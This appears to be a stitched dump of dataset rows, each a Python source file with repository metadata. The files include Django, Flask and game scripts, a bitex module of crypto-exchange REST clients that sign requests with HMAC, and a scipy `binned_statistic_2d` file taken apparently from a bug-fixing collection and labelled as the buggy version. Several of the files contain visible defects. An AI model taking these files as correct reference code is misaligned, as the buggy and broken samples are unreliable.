migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('code', models.CharField(max_length=20)),
('price', models.IntegerField()),
],
),
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='product',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.Shop'),
),
migrations.AddField(
model_name='orderline',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.Product'),
),
migrations.AddField(
model_name='order',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.Shop'),
),
]
| [
"[email protected]"
]
| |
a9fe63f7d3ec967b0984566e83707772eedadfb5 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/765188917950a2d371982a81fa142747ea65f14a-<binned_statistic_2d>-bug.py | 37399820742f3945f3f54302e29aeac36416da57 | []
| no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,928 | py | def binned_statistic_2d(x, y, values, statistic='mean', bins=10, range=None, expand_binnumbers=False):
"\n Compute a bidimensional binned statistic for one or more sets of data.\n\n This is a generalization of a histogram2d function. A histogram divides\n the space into bins, and returns the count of the number of points in\n each bin. This function allows the computation of the sum, mean, median,\n or other statistic of the values (or set of values) within each bin.\n\n Parameters\n ----------\n x : (N,) array_like\n A sequence of values to be binned along the first dimension.\n y : (N,) array_like\n A sequence of values to be binned along the second dimension.\n values : (N,) array_like or list of (N,) array_like\n The data on which the statistic will be computed. This must be\n the same shape as `x`, or a list of sequences - each with the same\n shape as `x`. If `values` is such a list, the statistic will be\n computed on each independently.\n statistic : string or callable, optional\n The statistic to compute (default is 'mean').\n The following statistics are available:\n\n * 'mean' : compute the mean of values for points within each bin.\n Empty bins will be represented by NaN.\n * 'std' : compute the standard deviation within each bin. This \n is implicitly calculated with ddof=0.\n * 'median' : compute the median of values for points within each\n bin. Empty bins will be represented by NaN.\n * 'count' : compute the count of points within each bin. This is\n identical to an unweighted histogram. `values` array is not\n referenced.\n * 'sum' : compute the sum of values for points within each bin.\n This is identical to a weighted histogram.\n * 'min' : compute the minimum of values for points within each bin.\n Empty bins will be represented by NaN.\n * 'max' : compute the maximum of values for point within each bin.\n Empty bins will be represented by NaN.\n * function : a user-defined function which takes a 1D array of\n values, and outputs a single numerical statistic. This function\n will be called on the values in each bin. Empty bins will be\n represented by function([]), or NaN if this returns an error.\n\n bins : int or [int, int] or array_like or [array, array], optional\n The bin specification:\n\n * the number of bins for the two dimensions (nx = ny = bins),\n * the number of bins in each dimension (nx, ny = bins),\n * the bin edges for the two dimensions (x_edge = y_edge = bins),\n * the bin edges in each dimension (x_edge, y_edge = bins).\n\n If the bin edges are specified, the number of bins will be,\n (nx = len(x_edge)-1, ny = len(y_edge)-1).\n\n range : (2,2) array_like, optional\n The leftmost and rightmost edges of the bins along each dimension\n (if not specified explicitly in the `bins` parameters):\n [[xmin, xmax], [ymin, ymax]]. All values outside of this range will be\n considered outliers and not tallied in the histogram.\n expand_binnumbers : bool, optional\n 'False' (default): the returned `binnumber` is a shape (N,) array of\n linearized bin indices.\n 'True': the returned `binnumber` is 'unraveled' into a shape (2,N)\n ndarray, where each row gives the bin numbers in the corresponding\n dimension.\n See the `binnumber` returned value, and the `Examples` section.\n\n .. versionadded:: 0.17.0\n\n Returns\n -------\n statistic : (nx, ny) ndarray\n The values of the selected statistic in each two-dimensional bin.\n x_edge : (nx + 1) ndarray\n The bin edges along the first dimension.\n y_edge : (ny + 1) ndarray\n The bin edges along the second dimension.\n binnumber : (N,) array of ints or (2,N) ndarray of ints\n This assigns to each element of `sample` an integer that represents the\n bin in which this observation falls. The representation depends on the\n `expand_binnumbers` argument. See `Notes` for details.\n\n\n See Also\n --------\n numpy.digitize, numpy.histogram2d, binned_statistic, binned_statistic_dd\n\n Notes\n -----\n Binedges:\n All but the last (righthand-most) bin is half-open. In other words, if\n `bins` is ``[1, 2, 3, 4]``, then the first bin is ``[1, 2)`` (including 1,\n but excluding 2) and the second ``[2, 3)``. The last bin, however, is\n ``[3, 4]``, which *includes* 4.\n\n `binnumber`:\n This returned argument assigns to each element of `sample` an integer that\n represents the bin in which it belongs. The representation depends on the\n `expand_binnumbers` argument. If 'False' (default): The returned\n `binnumber` is a shape (N,) array of linearized indices mapping each\n element of `sample` to its corresponding bin (using row-major ordering).\n If 'True': The returned `binnumber` is a shape (2,N) ndarray where\n each row indicates bin placements for each dimension respectively. In each\n dimension, a binnumber of `i` means the corresponding value is between\n (D_edge[i-1], D_edge[i]), where 'D' is either 'x' or 'y'.\n\n .. versionadded:: 0.11.0\n\n Examples\n --------\n >>> from scipy import stats\n\n Calculate the counts with explicit bin-edges:\n\n >>> x = [0.1, 0.1, 0.1, 0.6]\n >>> y = [2.1, 2.6, 2.1, 2.1]\n >>> binx = [0.0, 0.5, 1.0]\n >>> biny = [2.0, 2.5, 3.0]\n >>> ret = stats.binned_statistic_2d(x, y, None, 'count', bins=[binx,biny])\n >>> ret.statistic\n array([[ 2., 1.],\n [ 1., 0.]])\n\n The bin in which each sample is placed is given by the `binnumber`\n returned parameter. By default, these are the linearized bin indices:\n\n >>> ret.binnumber\n array([5, 6, 5, 9])\n\n The bin indices can also be expanded into separate entries for each\n dimension using the `expand_binnumbers` parameter:\n\n >>> ret = stats.binned_statistic_2d(x, y, None, 'count', bins=[binx,biny],\n ... expand_binnumbers=True)\n >>> ret.binnumber\n array([[1, 1, 1, 2],\n [1, 2, 1, 1]])\n\n Which shows that the first three elements belong in the xbin 1, and the\n fourth into xbin 2; and so on for y.\n\n "
try:
N = len(bins)
except TypeError:
N = 1
if ((N != 1) and (N != 2)):
xedges = yedges = np.asarray(bins, float)
bins = [xedges, yedges]
(medians, edges, binnumbers) = binned_statistic_dd([x, y], values, statistic, bins, range, expand_binnumbers=expand_binnumbers)
return BinnedStatistic2dResult(medians, edges[0], edges[1], binnumbers) | [
"[email protected]"
]
| |
5d8d85274d87f8f1d5474e429a79a01b31ce45a4 | 2e40c66b0fd702b55f94044cc4150bd0626fea57 | /dict.py | f05951365d5d6cd77d4ca818b9fdfec7717a5492 | []
| no_license | ramanuj760/PythonProject | 20b527f585b954819c0df75b303787e21d38deee | 3bd25757eaf29f5da46b1252ece5495aaae01670 | refs/heads/master | 2021-07-08T02:02:43.064020 | 2020-10-01T09:35:27 | 2020-10-01T09:35:27 | 191,696,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | """write a python program to guess number between 1 to 9"""
print("welcome in guess number")
import random
a= random.randint(1,20)
for i in range(9):
b = int(input("enter a value"))
if b<a:
print("user value is small value")
elif b>a:
print(" user value is greater values ")
else:
break
print("value given by user",b)
if a==b:
print("both the values are equal")
print("guessed number",a)
| [
"[email protected]"
]
| |
a42b36533d30b55a373753a69a88bc7ce88e7753 | c669f6041162d10f286cb2e04aa4163e6b37f951 | /l0qh4/repository/config_repository.py | a049fdea241ceb2ac175b74380e59f0575b7569a | []
| no_license | locnguyenvu/l0qh4 | 5096802263f4f5557d2576a2b3e00530b8743cc3 | fb1fc62dd12471c35f9d89b339fab4a52605f914 | refs/heads/master | 2023-01-09T16:50:55.418470 | 2020-11-07T04:22:56 | 2020-11-07T04:22:56 | 288,906,651 | 0 | 0 | null | 2020-11-07T04:22:57 | 2020-08-20T04:32:29 | Python | UTF-8 | Python | false | false | 164 | py | from .orm_model.config import Config
from ..shared.repository import Repository
class ConfigRepository(Repository):
ormclass = Config
domainclass = None
| [
"[email protected]"
]
| |
f47af696b45f0c254f382aef43afc297fd83e423 | 93ec296ce03189e48e52069ca8e5e35fd3765bbc | /build/lib/bitex/api/rest.py | f50a37da2ae6b0c2abeea6af1f34e02f46062e36 | [
"MIT"
]
| permissive | zhumzhu/bitex | b3be658fc97f313462efc9b1b21670c2622afa5c | 11d8f96ee7346fe5a3648d8b58377e41a956b67b | refs/heads/master | 2021-01-18T17:24:53.330001 | 2017-03-23T10:51:16 | 2017-03-23T10:51:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,370 | py | """
Contains all API Client sub-classes, which store exchange specific details
and feature the respective exchanges authentication method (sign()).
"""
# Import Built-ins
import logging
import json
import hashlib
import hmac
import base64
import time
import urllib
import urllib.parse
# Import Third-Party
from requests.auth import AuthBase
try:
import pyjwt as jwt
jwt = True
except ImportError:
jwt = False
# Import Homebrew
from bitex.api.REST.api import APIClient
log = logging.getLogger(__name__)
class BitfinexREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://api.bitfinex.com', timeout=5):
super(BitfinexREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
req = kwargs['params']
except KeyError:
req = {}
req['request'] = endpoint_path
req['nonce'] = self.nonce()
js = json.dumps(req)
data = base64.standard_b64encode(js.encode('utf8'))
h = hmac.new(self.secret.encode('utf8'), data, hashlib.sha384)
signature = h.hexdigest()
headers = {"X-BFX-APIKEY": self.key,
"X-BFX-SIGNATURE": signature,
"X-BFX-PAYLOAD": data}
return url, {'headers': headers}
class BitstampREST(APIClient):
def __init__(self, user_id='', key=None, secret=None, api_version=None,
url='https://www.bitstamp.net/api', timeout=5):
self.id = user_id
super(BitstampREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def load_key(self, path):
"""
Load key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.id = f.readline().strip()
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
message = nonce + self.id + self.key
signature = hmac.new(self.secret.encode(), message.encode(),
hashlib.sha256)
signature = signature.hexdigest().upper()
try:
req = kwargs['params']
except KeyError:
req = {}
req['key'] = self.key
req['nonce'] = nonce
req['signature'] = signature
return url, {'data': req}
class BittrexREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1.1',
url='https://bittrex.com/api', timeout=5):
super(BittrexREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
nonce = self.nonce()
req_string = endpoint_path + '?apikey=' + self.key + "&nonce=" + nonce + '&'
req_string += urllib.parse.urlencode(params)
headers = {"apisign": hmac.new(self.secret.encode('utf-8'),
(self.uri + req_string).encode('utf-8'),
hashlib.sha512).hexdigest()}
return self.uri + req_string, {'headers': headers, 'params': {}}
class CoincheckREST(APIClient):
def __init__(self, key=None, secret=None, api_version='api',
url='https://coincheck.com', timeout=5):
super(CoincheckREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
params = json.dumps(params)
# sig = nonce + url + req
data = (nonce + endpoint_path + params).encode('utf-8')
h = hmac.new(self.secret.encode('utf8'), data, hashlib.sha256)
signature = h.hexdigest()
headers = {"ACCESS-KEY": self.key,
"ACCESS-NONCE": nonce,
"ACCESS-SIGNATURE": signature}
return url, {'headers': headers}
class GdaxAuth(AuthBase):
def __init__(self, api_key, secret_key, passphrase):
self.api_key = api_key.encode('utf-8')
self.secret_key = secret_key.encode('utf-8')
self.passphrase = passphrase.encode('utf-8')
def __call__(self, request):
timestamp = str(time.time())
message = (timestamp + request.method + request.path_url +
(request.body or ''))
hmac_key = base64.b64decode(self.secret_key)
signature = hmac.new(hmac_key, message.encode('utf-8'), hashlib.sha256)
signature_b64 = base64.b64encode(signature.digest())
request.headers.update({
'CB-ACCESS-SIGN': signature_b64,
'CB-ACCESS-TIMESTAMP': timestamp,
'CB-ACCESS-KEY': self.api_key,
'CB-ACCESS-PASSPHRASE': self.passphrase,
'Content-Type': 'application/json'
})
return request
class GDAXRest(APIClient):
def __init__(self, passphrase='', key=None, secret=None, api_version=None,
url='https://api.gdax.com', timeout=5):
self.passphrase = passphrase
super(GDAXRest, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def load_key(self, path):
"""
Load key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.passphrase = f.readline().strip()
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
auth = GdaxAuth(self.key, self.secret, self.passphrase)
try:
js = kwargs['params']
except KeyError:
js = {}
return url, {'json': js, 'auth': auth}
class KrakenREST(APIClient):
def __init__(self, key=None, secret=None, api_version='0',
url='https://api.kraken.com', timeout=5):
super(KrakenREST, self).__init__(url, api_version=api_version,
key=key, secret=secret, timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
req = kwargs['params']
except KeyError:
req = {}
req['nonce'] = self.nonce()
postdata = urllib.parse.urlencode(req)
# Unicode-objects must be encoded before hashing
encoded = (str(req['nonce']) + postdata).encode('utf-8')
message = (endpoint_path.encode('utf-8') +
hashlib.sha256(encoded).digest())
signature = hmac.new(base64.b64decode(self.secret),
message, hashlib.sha512)
sigdigest = base64.b64encode(signature.digest())
headers = {
'API-Key': self.key,
'API-Sign': sigdigest.decode('utf-8')
}
return url, {'data': req, 'headers': headers}
class ItbitREST(APIClient):
def __init__(self, user_id = '', key=None, secret=None, api_version='v1',
url='https://api.itbit.com', timeout=5):
self.userId = user_id
super(ItbitREST, self).__init__(url, api_version=api_version,
key=key, secret=secret, timeout=timeout)
def load_key(self, path):
"""
Load user id, key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.userId = f.readline().strip()
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
verb = method_verb
if verb in ('PUT', 'POST'):
body = params
else:
body = {}
timestamp = self.nonce()
nonce = self.nonce()
message = json.dumps([verb, url, body, nonce, timestamp],
separators=(',', ':'))
sha256_hash = hashlib.sha256()
nonced_message = nonce + message
sha256_hash.update(nonced_message.encode('utf8'))
hash_digest = sha256_hash.digest()
hmac_digest = hmac.new(self.secret.encode('utf-8'),
url.encode('utf-8') + hash_digest,
hashlib.sha512).digest()
signature = base64.b64encode(hmac_digest)
auth_headers = {
'Authorization': self.key + ':' + signature.decode('utf8'),
'X-Auth-Timestamp': timestamp,
'X-Auth-Nonce': nonce,
'Content-Type': 'application/json'
}
return url, {'headers': auth_headers}
class OKCoinREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://www.okcoin.com/api', timeout=5):
super(OKCoinREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self,url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
# sig = nonce + url + req
data = (nonce + url).encode()
h = hmac.new(self.secret.encode('utf8'), data, hashlib.sha256)
signature = h.hexdigest()
headers = {"ACCESS-KEY": self.key,
"ACCESS-NONCE": nonce,
"ACCESS-SIGNATURE": signature}
return url, {'headers': headers}
class BTCERest(APIClient):
def __init__(self, key=None, secret=None, api_version='3',
url='https://btc-e.com/api', timeout=5):
super(BTCERest, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
post_params = params
post_params.update({'nonce': nonce, 'method': endpoint.split('/', 1)[1]})
post_params = urllib.parse.urlencode(post_params)
signature = hmac.new(self.secret.encode('utf-8'),
post_params.encode('utf-8'), hashlib.sha512)
headers = {'Key': self.key, 'Sign': signature.hexdigest(),
"Content-type": "application/x-www-form-urlencoded"}
# split by tapi str to gain clean url;
url = url.split('/tapi', 1)[0] + '/tapi'
return url, {'headers': headers, 'params': params}
class CCEXRest(APIClient):
def __init__(self, key=None, secret=None, api_version=None,
url='https://c-cex.com/t', timeout=5):
super(CCEXRest, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
params['apikey'] = self.key
params['nonce'] = nonce
post_params = params
post_params.update({'nonce': nonce, 'method': endpoint})
post_params = urllib.parse.urlencode(post_params)
url = uri + post_params
sig = hmac.new(url, self.secret, hashlib.sha512)
headers = {'apisign': sig}
return url, {'headers': headers}
class CryptopiaREST(APIClient):
def __init__(self, key=None, secret=None, api_version=None,
url='https://www.cryptopia.co.nz/api', timeout=5):
super(CryptopiaREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
post_data = json.dumps(params)
md5 = base64.b64encode(hashlib.md5().updated(post_data).digest())
sig = self.key + 'POST' + urllib.parse.quote_plus(uri).lower() + nonce + md5
hmac_sig = base64.b64encode(hmac.new(base64.b64decode(self.secret),
sig, hashlib.sha256).digest())
header_data = 'amx' + self.key + ':' + hmac_sig + ':' + nonce
headers = {'Authorization': header_data,
'Content-Type': 'application/json; charset=utf-8'}
return uri, {'headers': headers, 'data': post_data}
class GeminiREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://api.gemini.com', timeout=5):
super(GeminiREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
payload = params
payload['nonce'] = nonce
payload['request'] = endpoint_path
payload = base64.b64encode(json.dumps(payload))
sig = hmac.new(self.secret, payload, hashlib.sha384).hexdigest()
headers = {'X-GEMINI-APIKEY': self.key,
'X-GEMINI-PAYLOAD': payload,
'X-GEMINI-SIGNATURE': sig}
return uri, {'headers': headers}
class YunbiREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v2',
url='https://yunbi.com/api', timeout=5):
super(YunbiREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
params['tonce'] = nonce
params['access_key'] = self.key
post_params = urllib.parse.urlencode(params)
msg = '%s|%s|%s' % (method_verb, endpoint_path, post_params)
sig = hmac.new(self.secret, msg, hashlib.sha256).hexdigest()
uri += post_params + '&signature=' + sig
return uri, {}
class RockTradingREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://api.therocktrading.com', timeout=5):
super(RockTradingREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
payload = params
payload['nonce'] = int(nonce)
payload['request'] = endpoint_path
msg = nonce + uri
sig = hmac.new(self.secret.encode(), msg.encode(), hashlib.sha384).hexdigest()
headers = {'X-TRT-APIKEY': self.key,
'X-TRT-Nonce': nonce,
'X-TRT-SIGNATURE': sig, 'Content-Type': 'application/json'}
return uri, {'headers': headers}
class PoloniexREST(APIClient):
def __init__(self, key=None, secret=None, api_version=None,
url='https://poloniex.com', timeout=5):
super(PoloniexREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
params['nonce'] = self.nonce()
payload = params
msg = urllib.parse.urlencode(payload).encode('utf-8')
sig = hmac.new(self.secret.encode('utf-8'), msg, hashlib.sha512).hexdigest()
headers = {'Key': self.key, 'Sign': sig}
return uri, {'headers': headers, 'data': params}
class QuoineREST(APIClient):
"""
The Quoine Api requires the API version to be designated in each requests's
header as {'X-Quoine-API-Version': 2}
"""
def __init__(self, key=None, secret=None, api_version=None,
url='https://api.quoine.com/', timeout=5):
if not jwt:
raise SystemError("No JWT Installed! Quoine API Unavailable!")
super(QuoineREST, self).__init__(url, api_version=api_version,
key=key, secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
path = endpoint_path + urllib.parse.urlencode(params)
msg = {'path': path, 'nonce': self.nonce(), 'token_id': self.key}
signature = jwt.encode(msg, self.secret, algorithm='HS256')
headers = {'X-Quoine-API-Version': '2', 'X-Quoine-Auth': signature,
'Content-Type': 'application/json'}
return self.uri+path, {'headers': headers}
class QuadrigaCXREST(APIClient):
def __init__(self, key=None, secret=None, client_id='', api_version='v2',
url='https://api.quoine.com/', timeout=5):
self.client_id = client_id
super(QuadrigaCXREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def load_key(self, path):
"""
Load key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.client_id = f.readline().strip()
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
nonce = self.nonce()
msg = nonce + self.client_id + self.key
signature = hmac.new(self.secret.encode(encoding='utf-8'),
msg.encode(encoding='utf-8'), hashlib.sha256)
headers = {'key': self.key, 'signature': signature,
'nonce': nonce}
return self.uri, {'headers': headers, 'data': params} | [
"[email protected]"
]
| |
f3313107a5ffaa63d4869e3c442c991acd8d8d1c | 94eac0de3c2459edff4bc86a4a14dc73c8178a8e | /dag 2/Day 2 Exercise 2.2/buggy/dicegame/runner.py | 0d08a8dd7074327fff5aad2012400f8ab83cc50c | [
"MIT"
]
| permissive | U-Wik/my_repository | 650b57b7c734d055a383937f39abf17ca53cd282 | 6598e3b4878b1171827ea48729c2853c5c687fb0 | refs/heads/main | 2023-03-10T04:32:19.034363 | 2021-02-28T18:07:46 | 2021-02-28T18:07:46 | 339,459,117 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,149 | py | from .die import Die
from .utils import i_just_throw_an_exception
class GameRunner:
def __init__(self):
self.reset()
def reset(self):
self.round = 1
self.wins = 0
self.loses = 0
def answer(self):
total = 0
for die in self.dice:
total = total + die.value # not increment but added value
return total
@classmethod
def run(self): # not a bug as such but I change cls to self
# don't like "probably" i remove it
runner = self() # moved it here, from inside the loop, should be done once
guessCount = 0 # variable namne changed from c to guessCount
while True:
self.dice = Die.create_dice(5) # moved it here from __init__ to run it every turn
print("\nRound {}\n".format(runner.round)) # added line
for die in runner.dice:
print(die.show())
guess = '' # rewrote some lines to catch errors
while type(guess) != int:
guess = input("Sigh. What is your guess?: ")
try:
guess = int(guess)
except ValueError:
print('Not a numer. Try again!')
if guess == runner.answer():
print("Congrats, you can add like a 5 year old...")
runner.wins += 1
guessCount += 1
else:
print("Sorry that's wrong")
print("The answer is: {}".format(runner.answer()))
print("Like seriously, how could you mess that up")
runner.loses += 1
guessCount += 1 # (c or ) guessCount should be incremented
print("Wins: {} Loses {}".format(runner.wins, runner.loses))
runner.round += 1
if guessCount == 6:
print() # added line
if runner.wins > runner.loses: print("You won... Congrats...") # conditional ending
else: print("You did not win....") # conditional ending
print() # added line
prompt = input("Would you like to play again?[y/n]: ") # now asking after all rounds
if prompt == 'y' or prompt == 'Y': # replaced "" with "Y"
print()
runner.reset() # resetting
guessCount = 0 # resetting
continue
else:
break # strange ending changed to break
| [
"[email protected]"
]
| |
38af0a8f4ec7b286afc5854b6b8d7664edf331e0 | f4df9e53f984f293786fa3b890ab15f8c20abefd | /Django/beltreview/beltreview/urls.py | 7767d39b40ce4346388762908fc3bc5c218872b4 | []
| no_license | Chiefautoparts/Python_Party | bd0fbac9ea003f92be0f97d6f1d8f8d51c98a1b8 | 3d81052c51f14d5fc5dbd25317d23b891e766d8e | refs/heads/master | 2021-01-25T07:55:05.218262 | 2017-06-30T04:44:18 | 2017-06-30T04:44:18 | 93,680,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | """beltreview URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
| [
"[email protected]"
]
| |
fbb4019fa4789ab13854b2af3d2fa7780bbb329c | dd57fad95738d367c061d7881f8ab0d8dd60583c | /manage.py | 5061e823075a792df7c5af5d2cbd1860b72fc163 | [
"MIT"
]
| permissive | Zhaoyanzhang/-myflasky | e590f3d1f3af67d6bba7de4912b33c26e95cd9c1 | bfbd101574953762cb3d36de03e70868317eee1d | refs/heads/master | 2021-01-19T13:38:58.082291 | 2017-11-28T15:12:29 | 2017-11-28T15:12:29 | 100,850,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | #!/usr/bin/env python
import os
from app import create_app, db
from app.models import User, Role,Post,Follow,Permission,Comment
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role,Post=Post,\
Permission=Permission,Follow=Follow,Comment=Comment)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
manager.run()
| [
"[email protected]"
]
| |
03806ebeea1b9df25cd60918f7afec18ceff218d | d83d4914df570d6e22a5f6ff94d8fb8870f50d17 | /tests/query.py | f7ce98f11f1328cd3d46bcf71bbbf3db692b64d2 | []
| no_license | upton/amondawa | 73d6ea749fe1955559c0db5b32d497b54f4c88aa | 3fe3d4f5cb9312b3a8e113bd5b856d58dbc0ec0a | refs/heads/master | 2021-01-21T01:06:35.836652 | 2014-02-06T06:04:05 | 2014-02-06T06:04:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,220 | py | # Copyright (c) 2013 Daniel Gardner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from amondawa.auth import auth_add_auth1
import simplejson, httplib
from threading import Thread
class QueryRunner(Thread):
PATH = '/api/v1/nodomain/datapoints/query'
def __init__(self, host, port, access_key_id, secret_access_key):
super(QueryRunner, self).__init__()
self.access_key_id = access_key_id
self.secret_access_key = secret_access_key
self.host = host
self.port = port
self._connect()
def perform_query(self, query):
return self._perform_query(simplejson.dumps(query))
def _perform_query(self, query):
try:
headers = auth_add_auth1(self.access_key_id, self.secret_access_key,
'POST', self.host, self.port, QueryRunner.PATH, {'Content-Type': 'application/json'})
self.connection.request('POST', QueryRunner.PATH, query, headers)
return self.connection.getresponse()
except:
self._connect()
self.connection.request('POST', QueryRunner.PATH, query, headers)
return self.connection.getresponse()
def _connect(self):
self.connection = httplib.HTTPConnection(self.host, self.port)
def run(self):
pass
| [
"[email protected]"
]
| |
410f5cd2e5627cc13742a86d900883f68c5f4db4 | d0d023eab4b597460403f6378dbe3f4c0e35f106 | /break循环.py | 3e9f7a168c386b19c304d0cb3d89d2829d86dad0 | []
| no_license | UUtest/learnstone | ad99eb59785c670fb9d054a628b0f752b3b74914 | 17104b31aaf2b078bf2d002e6cb65d9ad3fe177e | refs/heads/master | 2021-01-19T10:57:14.897766 | 2018-06-25T11:33:10 | 2018-06-25T11:33:10 | 87,921,652 | 0 | 0 | null | 2017-04-16T14:14:07 | 2017-04-11T10:33:08 | null | UTF-8 | Python | false | false | 88 | py | n = 1
while n <= 100:
if n>10:
break
print(n)
n = n +1
print('END')
| [
"[email protected]"
]
| |
f1ae87159224252ac7dcbb0ad74eeb40808963a0 | 65ca44041d7925372120cdbcb8e08fa7c507c035 | /example/full/forward.py | e8b84cb61724f820ba54468d11347fd7c35a7e1f | [
"MIT"
]
